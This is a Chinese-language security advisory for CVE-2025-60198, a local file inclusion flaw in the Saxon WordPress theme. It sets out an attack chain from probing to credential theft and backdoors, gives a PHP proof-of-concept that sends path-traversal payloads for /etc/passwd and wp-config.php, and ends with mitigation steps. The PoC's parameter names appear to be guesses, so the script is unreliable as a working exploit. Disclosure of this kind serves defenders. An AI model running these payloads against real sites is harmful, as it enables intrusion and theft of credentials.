CVE-2025-60198: Saxon WordPress主题本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-60198

漏洞类型

本地文件包含

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Saxon - Viral Content Blog & Magazine Marketing WordPress Theme

漏洞概述

CVE-2025-60198是WordPress Saxon主题中的一个高危安全漏洞，CVSS评分达到8.1分。该漏洞属于PHP本地文件包含（Local File Inclusion，LFI）类型，存在于主题的PHP文件处理逻辑中。攻击者可以通过构造恶意的文件包含请求，无需任何认证即可利用此漏洞读取服务器上的敏感文件，包括但不限于配置文件、凭据文件、系统文件等。在特定配置环境下，攻击者甚至可能利用文件包含配合其他技术实现远程代码执行，从而完全控制受影响的服务器。Saxon是一款流行的WordPress博客和杂志营销主题，被广泛应用于各类内容网站。由于该主题版本1.9.3及之前的所有版本均受影响，全球大量使用该主题的网站可能面临安全风险。漏洞由Patchstack安全团队于2025年11月6日披露，建议所有使用该主题的用户立即采取修复措施。

技术细节

该漏洞存在于Saxon主题的PHP文件包含逻辑中，具体表现为对用户可控的输入参数缺乏充分的验证和过滤。攻击者可以通过HTTP请求中的特定参数（如action、page、file等常见参数名）注入路径遍历序列（如../）和恶意文件路径，诱导服务器包含并执行任意PHP文件。在默认的WordPress和PHP配置下，攻击者可以利用此漏洞读取服务器本地文件，例如读取wp-config.php获取数据库凭据和加密密钥，或者读取/etc/passwd获取系统用户信息。如果PHP的allow_url_include配置被启用，攻击者还可能尝试包含远程恶意PHP文件，实现远程代码执行。攻击的复杂度为高（AC:H），因为需要精确构造文件路径，但攻击者不需要任何认证（PR:N）且不需要用户交互（UI:N），这大大降低了攻击门槛。成功利用此漏洞会对系统的机密性、完整性和可用性造成严重影响（C:H/I:H/A:H）。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站是否使用Saxon WordPress主题，可通过检查页面源代码、主题目录路径或HTTP响应头中的特征标识

STEP 2

步骤2: 漏洞探测

攻击者向目标站点的admin-ajax.php或其他端点发送包含路径遍历序列的请求，测试是否存在本地文件包含漏洞

STEP 3

步骤3: 敏感文件读取

确认漏洞存在后，攻击者通过构造恶意的文件路径参数，读取服务器上的敏感文件如wp-config.php、/etc/passwd、.htaccess等

STEP 4

步骤4: 凭据提取

从wp-config.php等配置文件中提取数据库凭据、WordPress盐值、API密钥等敏感信息，用于进一步攻击或数据窃取

STEP 5

步骤5: 权限提升与远程代码执行

在特定环境下（如allow_url_include启用），攻击者可能通过包含远程恶意PHP文件或利用日志文件包含技术实现远程代码执行

STEP 6

步骤6: 持久化控制

成功执行代码后，攻击者可植入后门、创建管理员账户或安装恶意插件，实现对网站的持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2025-60198 PoC - Saxon WordPress Theme Local File Inclusion
// Usage: Modify TARGET_URL and run with PHP CLI

$target_url = "http://target-site.com/";
$endpoint = "wp-admin/admin-ajax.php";

// Common vulnerable parameters in WordPress themes
$vulnerable_params = [
    'action' => 'saxon_load_component',
    'component' => '../../../../../../../../../../etc/passwd',
    'file' => '../wp-config.php'
];

echo "[*] CVE-2025-60198 PoC - Saxon Theme LFI\n";
echo "[*] Target: {$target_url}\n\n";

// Build request URL
$full_url = $target_url . $endpoint . '?' . http_build_query($vulnerable_params);

echo "[>] Sending request to: {$full_url}\n";

// Using cURL to send request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[>] HTTP Status: {$http_code}\n";
echo "[>] Response:\n";
echo $response;
?>

影响范围

Saxon WordPress Theme <= 1.9.3

防御指南

临时缓解措施

在无法立即升级主题的情况下，可采取以下临时缓解措施：首先，通过Web服务器配置（如nginx的location规则或Apache的.htaccess）限制对可疑参数的访问，阻止包含../等路径遍历字符的请求；其次，临时禁用或重命名可能存在漏洞的PHP文件；再次，加强服务器目录权限，限制PHP进程对非必要目录的访问；最后，部署WAF规则识别并阻断常见的LFI攻击模式。建议在完成升级前加强对网站流量的监控，及时发现潜在的攻击行为。